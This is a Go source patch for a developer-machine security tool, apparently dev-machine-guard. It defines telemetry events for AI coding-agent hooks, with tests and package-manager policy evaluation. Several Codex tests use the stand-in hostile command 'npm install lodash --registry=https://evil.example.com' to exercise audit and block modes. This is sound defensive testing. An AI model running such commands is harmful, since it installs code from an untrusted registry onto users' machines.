// false on shipped builds.
type PolicyDecisionInfo struct {
	Mode string `json:"mode,omitempty"` // audit | block
	// Allowed and AllowlistHit deliberately lack omitempty: every
	// decision answers both explicitly, even when false.
	Allowed        bool   `json:"allowed"`
	WouldBlock     bool   `json:"would_block,omitempty"`
	Enforced       bool   `json:"enforced,omitempty"`
	Code           string `json:"code,omitempty"`
	InternalDetail string `json:"internal_detail,omitempty"`
	Registry       string `json:"registry,omitempty"`
	AllowlistHit   bool   `json:"allowlist_hit"`
	Bypass         string `json:"bypass,omitempty"` // "registry_flag" | "env_var" | "config_set" | "config_edit" | "userconfig_flag"
}

// Classifications carries top-level activity tags used by the audit pipeline.
type Classifications struct {
	IsShellCommand    bool `json:"is_shell_command,omitempty"`
	IsPackageManager  bool `json:"is_package_manager,omitempty"`
	IsMCPRelated      bool `json:"is_mcp_related,omitempty"`
	IsFileOperation   bool `json:"is_file_operation,omitempty"`
	IsNetworkActivity bool `json:"is_network_activity,omitempty"`
}

// IsZero reports whether no classification is set.
func (c Classifications) IsZero() bool {
	return c == (Classifications{})
}

// Enrichments holds optional, bounded enrichment payloads. All sub-blocks
// are pointers with omitempty, so an empty Enrichments marshals to {}.
type Enrichments struct {
	Shell          *ShellEnrichment    `json:"shell,omitempty"`
	PackageManager *PackageManagerInfo `json:"package_manager,omitempty"`
	MCP            *MCPInfo            `json:"mcp,omitempty"`
	Secrets        *SecretsScanInfo    `json:"secrets,omitempty"`
}

// ShellEnrichment captures redacted shell-command context.
type ShellEnrichment struct {
	Command          string `json:"command,omitempty"`
	CommandTruncated bool   `json:"command_truncated,omitempty"`
	WorkingDirectory string `json:"working_directory,omitempty"`
}

// PackageManagerInfo records detection + diff results from a shell event.
// Detected has no omitempty: a negative detection is still meaningful.
type PackageManagerInfo struct {
	Detected        bool         `json:"detected"`
	Name            string       `json:"name,omitempty"`
	CommandKind     string       `json:"command_kind,omitempty"`
	Registry        string       `json:"registry,omitempty"`
	ConfigSources   []string     `json:"config_sources,omitempty"`
	PackagesAdded   []PackageRef `json:"packages_added,omitempty"`
	PackagesRemoved []PackageRef `json:"packages_removed,omitempty"`
	PackagesChanged []PackageRef `json:"packages_changed,omitempty"`
	Confidence      string       `json:"confidence,omitempty"`
	Evidence        []string     `json:"evidence,omitempty"`
}

// PackageRef is one package version reference in a diff.
type PackageRef struct {
	Name    string `json:"name"`
	Version string `json:"version,omitempty"`
}

// MCPInfo carries the non-derivable facts produced by parsing a
// shell-launched MCP server invocation. It is emitted ONLY when the
// shell command itself is the only signal that an MCP server is in
// play (e.g. `npx -y @modelcontextprotocol/server-foo` under a Bash
// tool call). Direct `mcp__<server>__<tool>`-style tool events, MCP
// permission events, and Elicitation hooks already carry the server
// identity in top-level fields or the payload, so they emit no MCPInfo
// block.
type MCPInfo struct {
	Kind          string `json:"kind,omitempty"`           // local | unknown
	ServerName    string `json:"server_name,omitempty"`    // parsed from package or command
	ServerCommand string `json:"server_command,omitempty"` // redacted, capped
}

// SecretsScanInfo summarizes session-end transcript scanning.
// Scanned/FilesSeen/BytesSeen have no omitempty: "scanned, found
// nothing" must survive serialization.
type SecretsScanInfo struct {
	Scanned   bool            `json:"scanned"`
	FilesSeen int             `json:"files_seen"`
	BytesSeen int64           `json:"bytes_seen"`
	Findings  []SecretFinding `json:"findings,omitempty"`
	TimedOut  bool            `json:"timed_out,omitempty"`
}

// SecretFinding is one redacted scanner hit. Full secret values are never
// stored; only a fingerprint and a masked preview.
type SecretFinding struct {
	RuleID        string `json:"rule_id"`
	FilePath      string `json:"file_path,omitempty"`
	LineStart     int    `json:"line_start,omitempty"`
	LineEnd       int    `json:"line_end,omitempty"`
	Fingerprint   string `json:"fingerprint,omitempty"`
	MaskedPreview string `json:"masked_preview,omitempty"`
	Confidence    string `json:"confidence,omitempty"`
}

// TimeoutInfo records that an enrichment hit its cap. time.Duration
// marshals as an integer nanosecond count, matching the _ns key names.
type TimeoutInfo struct {
	Stage   string        `json:"stage"`
	Cap     time.Duration `json:"cap_ns"`
	Elapsed time.Duration `json:"elapsed_ns"`
}

// ErrorInfo records a non-fatal internal error tied to this event.
type ErrorInfo struct {
	Stage   string `json:"stage"`
	Code    string `json:"code"`
	Message string `json:"message,omitempty"`
}

// NewEventID returns a 128-bit random hex identifier.
func NewEventID() string {
	var b [16]byte
	if _, err := rand.Read(b[:]); err != nil {
		// crypto/rand failures are vanishingly rare on any supported OS;
		// fall back to a timestamp-derived id rather than failing the hook.
		// NOTE(review): only the first 8 bytes are overwritten here; the
		// remaining 8 keep whatever rand.Read left behind (possibly zero),
		// so fallback ids from the same nanosecond could collide — confirm
		// this is acceptable for the telemetry pipeline.
		ts := time.Now().UnixNano()
		for i := range 8 {
			b[i] = byte(ts >> (8 * i))
		}
	}
	return hex.EncodeToString(b[:])
}
diff --git a/internal/aiagents/event/event_test.go b/internal/aiagents/event/event_test.go
new file mode 100644
index 0000000..86bbf6d
--- /dev/null
+++ b/internal/aiagents/event/event_test.go
@@ -0,0 +1,444 @@
package event_test

import (
	"encoding/json"
	"reflect"
	"strings"
	"testing"
	"time"

	"github.com/step-security/dev-machine-guard/internal/aiagents/event"
)

func TestSchemaVersionIsDMGHookEventV1(t *testing.T) {
	// schema_version is "dmg.hook.event/v1". The backend strict-matches;
	// bumping requires a coordinated change.
	if event.SchemaVersion != "dmg.hook.event/v1" {
		t.Errorf("SchemaVersion = %q, want dmg.hook.event/v1", event.SchemaVersion)
	}
}

func TestNewEventIDIs128BitHex(t *testing.T) {
	id := event.NewEventID()
	if len(id) != 32 {
		t.Errorf("NewEventID len = %d, want 32 (16 bytes hex)", len(id))
	}
	// hex.EncodeToString emits lowercase digits only.
	for _, c := range id {
		ok := (c >= '0' && c <= '9') || (c >= 'a' && c <= 'f')
		if !ok {
			t.Errorf("NewEventID contains non-hex byte %q in %q", c, id)
			break
		}
	}
}

func TestNewEventIDIsUnique(t *testing.T) {
	seen := make(map[string]struct{}, 1024)
	for i := range 1024 {
		id := event.NewEventID()
		if _, dup := seen[id]; dup {
			t.Fatalf("NewEventID collision after %d draws: %s", i, id)
		}
		seen[id] = struct{}{}
	}
}

func TestEventJSONOmitsEmptyFields(t *testing.T) {
	ev := &event.Event{
		SchemaVersion: event.SchemaVersion,
		EventID:       "abcd",
		Timestamp:     time.Date(2026, 5, 5, 12, 0, 0, 0, time.UTC),
		AgentName:     "claude-code",
		HookEvent:     event.HookPreToolUse,
		ResultStatus:  event.ResultObserved,
	}
	out, err := json.Marshal(ev)
	if err != nil {
		t.Fatal(err)
	}
	got := string(out)
	// Optional fields must be elided.
	for _, banned := range []string{
		"agent_version", "session_id", "permission_mode", "customer_id",
		"user_identity", "device_id", "action_type", "tool_name",
		"tool_use_id", "is_sensitive", "payload", "classifications",
		"enrichments", "timeouts", "errors", "policy_decision",
	} {
		if strings.Contains(got, `"`+banned+`"`) {
			t.Errorf("expected %q to be omitted from empty event, got %s", banned, got)
		}
	}
	// schema_version, event_id, agent_name, hook_event, result_status
	// are always present.
	for _, want := range []string{
		`"schema_version":"dmg.hook.event/v1"`,
		`"event_id":"abcd"`,
		`"agent_name":"claude-code"`,
		`"hook_event":"PreToolUse"`,
		`"result_status":"observed"`,
	} {
		if !strings.Contains(got, want) {
			t.Errorf("expected output to contain %s, got %s", want, got)
		}
	}
}

func TestClassificationsIsZero(t *testing.T) {
	var c event.Classifications
	if !c.IsZero() {
		t.Error("zero Classifications should report IsZero=true")
	}
	c.IsShellCommand = true
	if c.IsZero() {
		t.Error("non-zero Classifications should report IsZero=false")
	}
}

func TestEnumWireValues(t *testing.T) {
	// Every enum string is part of the wire format. The backend
	// strict-matches; renaming a constant is a coordinated migration,
	// not a refactor. This test pins the literals so a casual rename
	// fails CI loudly rather than silently breaking telemetry.
	// Actual wire value for each constant, keyed by constant name.
	cases := map[string]string{
		// ActionType
		"ActionFileRead":       string(event.ActionFileRead),
		"ActionFileWrite":      string(event.ActionFileWrite),
		"ActionFileDelete":     string(event.ActionFileDelete),
		"ActionCommandExec":    string(event.ActionCommandExec),
		"ActionNetworkRequest": string(event.ActionNetworkRequest),
		"ActionToolUse":        string(event.ActionToolUse),
		"ActionMCPInvocation":  string(event.ActionMCPInvocation),
		// ResultStatus
		"ResultObserved": string(event.ResultObserved),
		"ResultSuccess":  string(event.ResultSuccess),
		"ResultError":    string(event.ResultError),
		"ResultTimeout":  string(event.ResultTimeout),
		"ResultPartial":  string(event.ResultPartial),
		// HookEvent (Claude Code natives)
		"HookPreToolUse":         string(event.HookPreToolUse),
		"HookPostToolUse":        string(event.HookPostToolUse),
		"HookPostToolUseFailure": string(event.HookPostToolUseFailure),
		"HookSessionStart":       string(event.HookSessionStart),
		"HookSessionEnd":         string(event.HookSessionEnd),
		"HookNotification":       string(event.HookNotification),
		"HookStop":               string(event.HookStop),
		"HookSubagentStop":       string(event.HookSubagentStop),
		"HookUserPrompt":         string(event.HookUserPrompt),
		"HookElicitation":        string(event.HookElicitation),
		"HookElicitationResult":  string(event.HookElicitationResult),
		"HookPermissionRequest":  string(event.HookPermissionRequest),
		"HookPermissionDenied":   string(event.HookPermissionDenied),
		// HookPhase
		"HookPhaseUnknown":           string(event.HookPhaseUnknown),
		"HookPhasePreTool":           string(event.HookPhasePreTool),
		"HookPhasePostTool":          string(event.HookPhasePostTool),
		"HookPhasePostToolFailure":   string(event.HookPhasePostToolFailure),
		"HookPhasePermissionRequest": string(event.HookPhasePermissionRequest),
		"HookPhasePermissionDenied":  string(event.HookPhasePermissionDenied),
		"HookPhaseElicitation":       string(event.HookPhaseElicitation),
		"HookPhaseElicitationResult": string(event.HookPhaseElicitationResult),
		"HookPhaseUserPrompt":        string(event.HookPhaseUserPrompt),
		"HookPhaseSessionStart":      string(event.HookPhaseSessionStart),
		"HookPhaseSessionEnd":        string(event.HookPhaseSessionEnd),
		"HookPhaseNotification":      string(event.HookPhaseNotification),
		"HookPhaseStop":              string(event.HookPhaseStop),
		"HookPhaseSubagentStop":      string(event.HookPhaseSubagentStop),
	}
	// Expected wire literal for each constant name above.
	want := map[string]string{
		"ActionFileRead":       "file_read",
		"ActionFileWrite":      "file_write",
		"ActionFileDelete":     "file_delete",
		"ActionCommandExec":    "command_exec",
		"ActionNetworkRequest": "network_request",
		"ActionToolUse":        "tool_use",
		"ActionMCPInvocation":  "mcp_invocation",
		"ResultObserved":       "observed",
		"ResultSuccess":        "success",
		"ResultError":          "error",
		"ResultTimeout":        "timeout",
		"ResultPartial":        "partial",
		"HookPreToolUse":       "PreToolUse",
		"HookPostToolUse":      "PostToolUse",
		"HookPostToolUseFailure": "PostToolUseFailure",
		"HookSessionStart":     "SessionStart",
		"HookSessionEnd":       "SessionEnd",
		"HookNotification":     "Notification",
		"HookStop":             "Stop",
		"HookSubagentStop":     "SubagentStop",
		"HookUserPrompt":       "UserPromptSubmit",
		"HookElicitation":      "Elicitation",
		"HookElicitationResult": "ElicitationResult",
		"HookPermissionRequest": "PermissionRequest",
		"HookPermissionDenied":  "PermissionDenied",
		"HookPhaseUnknown":      "unknown",
		"HookPhasePreTool":      "pre_tool",
		"HookPhasePostTool":     "post_tool",
		"HookPhasePostToolFailure":   "post_tool_failure",
		"HookPhasePermissionRequest": "permission_request",
		"HookPhasePermissionDenied":  "permission_denied",
		"HookPhaseElicitation":       "elicitation",
		"HookPhaseElicitationResult": "elicitation_result",
		"HookPhaseUserPrompt":        "user_prompt",
		"HookPhaseSessionStart":      "session_start",
		"HookPhaseSessionEnd":        "session_end",
		"HookPhaseNotification":      "notification",
		"HookPhaseStop":              "stop",
		"HookPhaseSubagentStop":      "subagent_stop",
	}
	for name, got := range cases {
		if got != want[name] {
			t.Errorf("%s wire value = %q, want %q", name, got, want[name])
		}
	}
}

func TestEventFullRoundTrip(t *testing.T) {
	// Schema-drift detector: populate every field, marshal, unmarshal,
	// reflect.DeepEqual. If anyone adds a field without giving it
	// (de)serialization coverage on both sides, this fails.
	in := &event.Event{
		SchemaVersion:    event.SchemaVersion,
		EventID:          "deadbeef",
		Timestamp:        time.Date(2026, 5, 5, 12, 0, 0, 123456789, time.UTC),
		AgentName:        "claude-code",
		AgentVersion:     "1.2.3",
		HookEvent:        event.HookPreToolUse,
		HookPhase:        event.HookPhasePreTool,
		SessionID:        "sess-1",
		WorkingDirectory: "/tmp/work",
		PermissionMode:   "default",
		CustomerID:       "cust-1",
		UserIdentity:     "alice@example.com",
		DeviceID:         "dev-1",
		ActionType:       event.ActionCommandExec,
		ToolName:         "Bash",
		ToolUseID:        "use-1",
		ResultStatus:     event.ResultObserved,
		IsSensitive:      true,
		Payload:          map[string]any{"k": "v"},
		Classifications: &event.Classifications{
			IsShellCommand:    true,
			IsPackageManager:  true,
			IsMCPRelated:      true,
			IsFileOperation:   true,
			IsNetworkActivity: true,
		},
		Enrichments: &event.Enrichments{
			Shell: &event.ShellEnrichment{
				Command:          "echo hi",
				CommandTruncated: false,
				WorkingDirectory: "/tmp",
			},
			PackageManager: &event.PackageManagerInfo{
				Detected:        true,
				Name:            "npm",
				CommandKind:     "install",
				Registry:        "https://registry.npmjs.org",
				ConfigSources:   []string{".npmrc"},
				PackagesAdded:   []event.PackageRef{{Name: "foo", Version: "1.0.0"}},
				PackagesRemoved: []event.PackageRef{{Name: "bar"}},
				PackagesChanged: []event.PackageRef{{Name: "baz", Version: "2.0.0"}},
				Confidence:      "high",
				Evidence:        []string{"package.json"},
			},
			MCP: &event.MCPInfo{
				Kind:          "local",
				ServerName:    "server-foo",
				ServerCommand: "npx -y @modelcontextprotocol/server-foo",
			},
			Secrets: &event.SecretsScanInfo{
				Scanned:   true,
				FilesSeen: 3,
				BytesSeen: 1024,
				Findings: []event.SecretFinding{{
					RuleID:        "aws-key",
					FilePath:      "/tmp/x",
					LineStart:     1,
					LineEnd:       1,
					Fingerprint:   "abc",
					MaskedPreview: "AKIA…",
					Confidence:    "high",
				}},
				TimedOut: false,
			},
		},
		Timeouts: []event.TimeoutInfo{{
			Stage:   "enrich",
			Cap:     5 * time.Second,
			Elapsed: 6 * time.Second,
		}},
		Errors: []event.ErrorInfo{{
			Stage:   "redact",
			Code:    "regex_overflow",
			Message: "pattern too long",
		}},
		PolicyDecision: &event.PolicyDecisionInfo{
			Mode:           "audit",
			Allowed:        true,
			WouldBlock:     true,
			Enforced:       false,
			Code:           "blocked_pkg",
			InternalDetail: "matched rule X",
			Registry:       "npm",
			AllowlistHit:   false,
			Bypass:         "registry_flag",
		},
	}
	out, err := json.Marshal(in)
	if err != nil {
		t.Fatal(err)
	}
	var got event.Event
	if err := json.Unmarshal(out, &got); err != nil {
		t.Fatal(err)
	}
	if !reflect.DeepEqual(in, &got) {
		t.Errorf("round-trip mismatch.\n in = %+v\nout = %+v", in, &got)
	}
}

func TestPackageManagerInfo_AlwaysEmitsDetected(t *testing.T) {
	// PackageManagerInfo.Detected has no omitempty by design — even a
	// negative detection ("we ran the package-manager classifier; nothing
	// matched") is meaningful to downstream pipelines. Guard the absence
	// of omitempty.
	out, err := json.Marshal(event.PackageManagerInfo{Detected: false})
	if err != nil {
		t.Fatal(err)
	}
	if !strings.Contains(string(out), `"detected":false`) {
		t.Errorf("expected detected:false to appear in %s", string(out))
	}
}

func TestSecretsScanInfo_AlwaysEmitsCounters(t *testing.T) {
	// Scanned/FilesSeen/BytesSeen have no omitempty — a session-end with
	// zero files seen is still a meaningful "we scanned and found nothing"
	// signal. Guard the absence of omitempty.
	out, err := json.Marshal(event.SecretsScanInfo{})
	if err != nil {
		t.Fatal(err)
	}
	got := string(out)
	for _, want := range []string{`"scanned":false`, `"files_seen":0`, `"bytes_seen":0`} {
		if !strings.Contains(got, want) {
			t.Errorf("expected %s in %s", want, got)
		}
	}
}

func TestPolicyDecisionInfo_AlwaysEmitsAllowedAndAllowlistHit(t *testing.T) {
	// Allowed and AllowlistHit have no omitempty: every policy decision
	// must answer both questions explicitly, even when both are false.
	out, err := json.Marshal(event.PolicyDecisionInfo{})
	if err != nil {
		t.Fatal(err)
	}
	got := string(out)
	for _, want := range []string{`"allowed":false`, `"allowlist_hit":false`} {
		if !strings.Contains(got, want) {
			t.Errorf("expected %s in %s", want, got)
		}
	}
}

func TestEnrichments_NilSubBlocksOmitted(t *testing.T) {
	// All Enrichments sub-fields are pointers with omitempty — a top-level
	// Enrichments with no sub-blocks should marshal to {}, not to a struct
	// with `null` keys.
	out, err := json.Marshal(event.Enrichments{})
	if err != nil {
		t.Fatal(err)
	}
	if string(out) != "{}" {
		t.Errorf("empty Enrichments should marshal to {}, got %s", string(out))
	}
}

func TestPolicyBypassValues_RoundTrip(t *testing.T) {
	// The five documented bypass tags must round-trip as plain strings.
	// They are part of the audit wire format.
	for _, tag := range []string{"registry_flag", "env_var", "config_set", "config_edit", "userconfig_flag"} {
		t.Run(tag, func(t *testing.T) {
			in := event.PolicyDecisionInfo{Bypass: tag}
			out, err := json.Marshal(in)
			if err != nil {
				t.Fatal(err)
			}
			if !strings.Contains(string(out), `"bypass":"`+tag+`"`) {
				t.Errorf("bypass %q missing from %s", tag, string(out))
			}
			var back event.PolicyDecisionInfo
			if err := json.Unmarshal(out, &back); err != nil {
				t.Fatal(err)
			}
			if back.Bypass != tag {
				t.Errorf("round-trip lost bypass tag: got %q want %q", back.Bypass, tag)
			}
		})
	}
}

func TestTimestampIsRFC3339Nano(t *testing.T) {
	// Backend parses timestamp as RFC3339Nano (Go's default time.Time
	// marshal). Pin it so a switch to a custom MarshalJSON would fail
	// the test.
	ev := event.Event{
		SchemaVersion: event.SchemaVersion,
		EventID:       "x",
		Timestamp:     time.Date(2026, 5, 5, 12, 0, 0, 123456789, time.UTC),
		AgentName:     "claude-code",
		HookEvent:     event.HookPreToolUse,
		ResultStatus:  event.ResultObserved,
	}
	out, err := json.Marshal(ev)
	if err != nil {
		t.Fatal(err)
	}
	want := `"timestamp":"2026-05-05T12:00:00.123456789Z"`
	if !strings.Contains(string(out), want) {
		t.Errorf("expected %s in %s", want, string(out))
	}
}

func TestPolicyDecisionInfoTruthTable(t *testing.T) {
	// Verify the truth-table documented on PolicyDecisionInfo round-trips
	// through JSON cleanly. Only audit rows are emitted in production;
	// the block row is exercised by tests so block-mode flip is a flag
	// flip, not a shape change.
	cases := []struct {
		name string
		info event.PolicyDecisionInfo
		want []string // substrings that must appear
	}{
		{
			name: "audit no violation",
			info: event.PolicyDecisionInfo{Mode: "audit", Allowed: true},
			want: []string{`"mode":"audit"`, `"allowed":true`},
		},
		{
			name: "audit violation",
			info: event.PolicyDecisionInfo{Mode: "audit", Allowed: true, WouldBlock: true},
			want: []string{`"would_block":true`, `"allowed":true`},
		},
		{
			name: "block violation",
			info: event.PolicyDecisionInfo{Mode: "block", Allowed: false, WouldBlock: true, Enforced: true},
			want: []string{`"allowed":false`, `"enforced":true`, `"would_block":true`},
		},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			out, err := json.Marshal(tc.info)
			if err != nil {
				t.Fatal(err)
			}
			got := string(out)
			for _, w := range tc.want {
				if !strings.Contains(got, w) {
					t.Errorf("missing %s in %s", w, got)
				}
			}
		})
	}
}
diff --git a/internal/aiagents/hook/codex_test.go b/internal/aiagents/hook/codex_test.go
new file mode 100644
index 0000000..2231eda
--- /dev/null
+++ b/internal/aiagents/hook/codex_test.go
@@ -0,0 +1,192 @@
package hook

import (
	"bytes"
	"context"
	"encoding/json"
	"strings"
	"testing"
	"time"

	"github.com/step-security/dev-machine-guard/internal/aiagents/adapter/codex"
	"github.com/step-security/dev-machine-guard/internal/aiagents/event"
	"github.com/step-security/dev-machine-guard/internal/aiagents/policy"
	"github.com/step-security/dev-machine-guard/internal/executor"
)

// newCodexRuntime builds a Runtime wired to the Codex adapter, with
// stdin fed from payload, stdout captured in the returned buffer, and
// uploads/errors recorded in the returned captured sink.
func newCodexRuntime(t *testing.T, payload string, pol *policy.Policy) (*Runtime, *captured, *bytes.Buffer) {
	t.Helper()
	// NOTE(review): `cap` shadows the builtin cap(); harmless here but
	// worth renaming (cf. the equivalent helper in policy_test.go).
	cap := &captured{}
	stdout := &bytes.Buffer{}
	rt := &Runtime{
		Adapter: codex.New(t.TempDir(), "/usr/local/bin/stepsecurity-dev-machine-guard"),
		Exec:    executor.NewMock(),
		Stdin:   strings.NewReader(payload),
		Stdout:  stdout,
		Stderr:  &bytes.Buffer{},
		Now:     func() time.Time { return time.Now().UTC() },
		Policy:      pol,
		UploadEvent: cap.capture(),
		LogError:    cap.logError(),
	}
	return rt, cap, stdout
}

// runCodex runs one hook invocation and returns the decoded wire
// response plus the first uploaded event — nil when nothing was uploaded.
func runCodex(t *testing.T, hook event.HookEvent, payload string, pol *policy.Policy) (map[string]any, *event.Event) {
	t.Helper()
	rt, cap, stdout := newCodexRuntime(t, payload, pol)
	_ = rt.Run(context.Background(), hook)
	var resp map[string]any
	if err := json.Unmarshal(bytes.TrimSpace(stdout.Bytes()), &resp); err != nil {
		t.Fatalf("stdout not JSON: %v: %q", err, stdout.Bytes())
	}
	if len(cap.events) == 0 {
		return resp, nil
	}
	ev := cap.events[0]
	return resp, &ev
}

// Codex allow path emits {} on every hook event.
func TestCodexAllowEmitsEmptyObject(t *testing.T) {
	resp, ev := runCodex(t, codex.HookPreToolUse, `{
		"session_id":"s",
		"cwd":"/tmp",
		"tool_name":"Bash",
		"tool_input":{"command":"ls"}
	}`, nil)
	if len(resp) != 0 {
		t.Errorf("allow response must be {}, got %v", resp)
	}
	if ev == nil {
		t.Fatal("expected 1 event captured")
	}
	if ev.AgentName != "codex" {
		t.Errorf("agent_name: %v", ev.AgentName)
	}
}

// Codex PreToolUse Bash with package-manager violation reaches policy
// (PreTool phase + command_exec) and persists allowed=true under audit
// mode. Wire response stays {}.
+func TestCodexAuditPolicyViolationAllowsAndPersists(t *testing.T) { + resp, ev := runCodex(t, codex.HookPreToolUse, `{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"npm install lodash --registry=https://evil.example.com"} + }`, nil) + if len(resp) != 0 { + t.Errorf("audit-mode block must still emit {}, got %v", resp) + } + pd := ev.PolicyDecision + if pd == nil { + t.Fatalf("expected policy_decision: %+v", ev) + } + if !pd.Allowed { + t.Errorf("audit mode must allow: %+v", pd) + } + if !pd.WouldBlock { + t.Errorf("expected would_block=true: %+v", pd) + } + if pd.Enforced { + t.Errorf("audit mode must not enforce: %+v", pd) + } +} + +// Codex block-mode PreToolUse policy violation renders the Codex deny +// shape (NOT Claude's continue/suppressOutput shape). +func TestCodexBlockPreToolUseEmitsCodexDeny(t *testing.T) { + pol := policy.Builtin() + pol.Mode = policy.ModeBlock + resp, _ := runCodex(t, codex.HookPreToolUse, `{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"npm install lodash --registry=https://evil.example.com"} + }`, &pol) + hso, ok := resp["hookSpecificOutput"].(map[string]any) + if !ok { + t.Fatalf("expected hookSpecificOutput, got %v", resp) + } + if hso["hookEventName"] != "PreToolUse" { + t.Errorf("hookEventName: %v", hso["hookEventName"]) + } + if hso["permissionDecision"] != "deny" { + t.Errorf("permissionDecision: %v", hso["permissionDecision"]) + } + for _, banned := range []string{"continue", "suppressOutput", "stopReason", "decision"} { + if _, has := resp[banned]; has { + t.Errorf("Codex block response must not include %q, got %v", banned, resp) + } + } +} + +// PermissionRequest carrying a Bash payload must NOT trigger +// package-manager policy because action_type is empty. 
+func TestCodexPermissionRequestSkipsPolicy(t *testing.T) { + pol := policy.Builtin() + pol.Mode = policy.ModeBlock + resp, ev := runCodex(t, codex.HookPermissionRequest, `{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"npm install lodash --registry=https://evil.example.com"} + }`, &pol) + if len(resp) != 0 { + t.Errorf("PermissionRequest must emit {}, got %v", resp) + } + if ev != nil && ev.PolicyDecision != nil { + t.Errorf("PermissionRequest must not evaluate policy: %+v", ev.PolicyDecision) + } +} + +// PostToolUse must not block even with a block decision because +// post_tool side effects already happened. +func TestCodexPostToolUseNeverBlocks(t *testing.T) { + pol := policy.Builtin() + pol.Mode = policy.ModeBlock + resp, _ := runCodex(t, codex.HookPostToolUse, `{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"npm install lodash --registry=https://evil.example.com"}, + "tool_response":"ok" + }`, &pol) + if len(resp) != 0 { + t.Errorf("PostToolUse must always emit {}, got %v", resp) + } +} + +// apply_patch's tool_input.command is a patch payload, not shell input. +// npm policy must not see it even when patch text contains "npm install". +func TestCodexApplyPatchDoesNotTriggerNpmPolicy(t *testing.T) { + pol := policy.Builtin() + pol.Mode = policy.ModeBlock + resp, ev := runCodex(t, codex.HookPreToolUse, `{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"apply_patch", + "tool_input":{"command":"*** Begin Patch\nnpm install lodash --registry=https://evil.example.com"} + }`, &pol) + if len(resp) != 0 { + t.Errorf("apply_patch must not block, got %v", resp) + } + if ev != nil && ev.PolicyDecision != nil { + t.Errorf("apply_patch must not evaluate policy: %+v", ev.PolicyDecision) + } +} + +// Unknown Codex hook still returns {} with HookPhaseUnknown. 
func TestCodexUnknownHookReturnsEmpty(t *testing.T) {
	resp, ev := runCodex(t, "BogusEvent", `{}`, nil)
	if len(resp) != 0 {
		t.Errorf("unknown hook must emit {}, got %v", resp)
	}
	if ev == nil {
		t.Fatal("expected event captured")
	}
	if ev.HookPhase != event.HookPhaseUnknown {
		t.Errorf("unknown hook phase: %v", ev.HookPhase)
	}
}
diff --git a/internal/aiagents/hook/policy.go b/internal/aiagents/hook/policy.go
new file mode 100644
index 0000000..02a8e86
--- /dev/null
+++ b/internal/aiagents/hook/policy.go
@@ -0,0 +1,149 @@
package hook

import (
	"context"

	"github.com/step-security/dev-machine-guard/internal/aiagents/adapter"
	"github.com/step-security/dev-machine-guard/internal/aiagents/event"
	"github.com/step-security/dev-machine-guard/internal/aiagents/policy"
)

// shouldEvaluatePolicy is the cheap filter that runs before any I/O.
// It is normalized over hook_phase so future agents reuse it without
// branching on Claude-specific hook names.
//
// Only pre_tool command executions with a non-empty command string
// qualify; everything else (post-tool, permission, session events, or
// an absent command) is skipped.
func shouldEvaluatePolicy(ev *event.Event, cmd string) bool {
	if ev == nil {
		return false
	}
	if ev.HookPhase != event.HookPhasePreTool {
		return false
	}
	if ev.ActionType != event.ActionCommandExec {
		return false
	}
	return cmd != ""
}

// evaluatePolicy is the stage between enrichment and upload. It returns
// (nil, AllowDecision) when the observed binary does not belong to a
// known ecosystem, when the ecosystem block is disabled, when the command
// is not policy-relevant, or when any internal step fails — fail-open is
// preserved on every error path.
//
// The returned adapter.Decision is the *effective* response. The
// evaluator forces ModeAudit before consulting the verdict, so block
// decisions never escape this function. The block code path remains
// exercised by tests that inject a Policy with Mode=block; production
// builds never set it.
func (rt *Runtime) evaluatePolicy(_ context.Context, ev *event.Event, cmd string) (*event.PolicyDecisionInfo, adapter.Decision) {
	allow := adapter.AllowDecision()

	if cmd == "" {
		return nil, allow
	}

	// Embedded policy by default; rt.Policy is a test-injection override.
	pol := policy.Builtin()
	if rt.Policy != nil {
		pol = *rt.Policy
	}

	parsed := policy.ParseShell(cmd)
	eco := policy.EcosystemFor(parsed.Binary)
	if eco == "" {
		// Binary not part of any known ecosystem — fail open.
		return nil, allow
	}
	if block, ok := pol.Ecosystems[eco]; !ok || !block.Enabled {
		return nil, allow
	}

	req := policy.Request{
		Ecosystem:      eco,
		PackageManager: normalizePM(parsed.Binary),
		CommandKind:    commandKindFor(parsed, ev),
		RegistryFlag:   parsed.RegistryFlag,
		UserconfigFlag: parsed.UserconfigFlag,
		InlineEnv:      parsed.InlineEnv,
	}
	// Config mutations carry the mutated key/value so managed-key rules
	// can match on them.
	if parsed.ConfigOp != "" {
		req.ConfigKeyMutated = parsed.ConfigKey
		req.ConfigValue = parsed.ConfigValue
	}

	// Registry comes from enrichment (npm.Enrich) when available.
	if ev.Enrichments != nil && ev.Enrichments.PackageManager != nil {
		req.Registry = ev.Enrichments.PackageManager.Registry
	}

	verdict := policy.Eval(pol, req)
	mode := policy.ResolveMode(pol)
	wouldBlock := !verdict.Allow
	enforced := wouldBlock && mode == policy.ModeBlock

	info := &event.PolicyDecisionInfo{
		Mode: string(mode),
		// Allowed reflects the effective response, not the verdict.
		Allowed:        !enforced,
		WouldBlock:     wouldBlock,
		Enforced:       enforced,
		Code:           string(verdict.Code),
		InternalDetail: verdict.InternalDetail,
		Registry:       req.Registry,
		// NOTE(review): any allowed request with a known registry counts
		// as an allowlist hit here — confirm this matches the backend's
		// definition of "allowlist_hit".
		AllowlistHit: verdict.Allow && req.Registry != "",
		Bypass:       bypassFor(verdict.Code),
	}
	if enforced {
		return info, adapter.Decision{Allow: false, UserMessage: verdict.UserMessage}
	}
	return info, allow
}

// commandKindFor maps a parsed-shell shape onto the policy.Request kind
// vocabulary. Config ops win because the parser detects them with high
// specificity; otherwise we fall back to whatever npm.Enrich classified.
